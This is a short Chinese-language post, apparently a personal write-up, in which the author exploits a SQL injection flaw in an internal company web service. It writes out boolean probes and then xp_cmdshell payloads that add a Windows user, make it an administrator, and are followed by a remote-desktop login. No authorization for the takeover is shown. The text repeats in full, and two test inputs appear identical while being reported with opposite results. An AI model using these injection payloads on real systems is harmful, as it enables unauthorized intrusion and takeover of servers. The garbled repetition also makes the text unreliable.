上周末 会议汇报时,zhangww提供了查询奥威内部信息的web service
http://192.168.0.67/****/a.asmx
可以输入名字简称字符串如zhangww,并返回相关信息
凭直觉,估计有SQL漏洞(奥威以前的网站、服务都没考虑这点)
经测试,输入zhangww' and '1'='1, 返回成功信息
输入zhangww' and '1'='1,返回没有匹配信息
输入zhangww' and1 '1'='1 返回没有匹配信息
果然有,不过外层try catch了一下 不能取得Sql错误以获取详细信息
于是告诉他 有漏洞
今早过去,发现仍能注入。。
于是决定玩一下
输入 zhangww' and (select count(*) from sysobjects)>0 and '1'='1 ,返回成功信息
Sql Server数据库
增加用户:
输入 zhangww;exec master.dbo.xp_cmdshell 'net user name password /add' --
提升为管理员:
输入 zhangww;exec master.dbo.xp_cmdshell 'net localgroup administrators name /add' --
远程桌面,连上。。
(居然Sql是用sa连的。。)
http://192.168.0.67/****/a.asmx
可以输入名字简称字符串如zhangww,并返回相关信息
凭直觉,估计有SQL漏洞(奥威以前的网站、服务都没考虑这点)
经测试,输入zhangww' and '1'='1, 返回成功信息
输入zhangww' and '1'='1,返回没有匹配信息
输入zhangww' and1 '1'='1 返回没有匹配信息
果然有,不过外层try catch了一下 不能取得Sql错误以获取详细信息
于是告诉他 有漏洞
今早过去,发现仍能注入。。
于是决定玩一下
输入 zhangww' and (select count(*) from sysobjects)>0 and '1'='1 ,返回成功信息
Sql Server数据库
增加用户:
输入 zhangww;exec master.dbo.xp_cmdshell 'net user name password /add' --
提升为管理员:
输入 zhangww;exec master.dbo.xp_cmdshell 'net localgroup administrators name /add' --
远程桌面,连上。。
(居然Sql是用sa连的。。)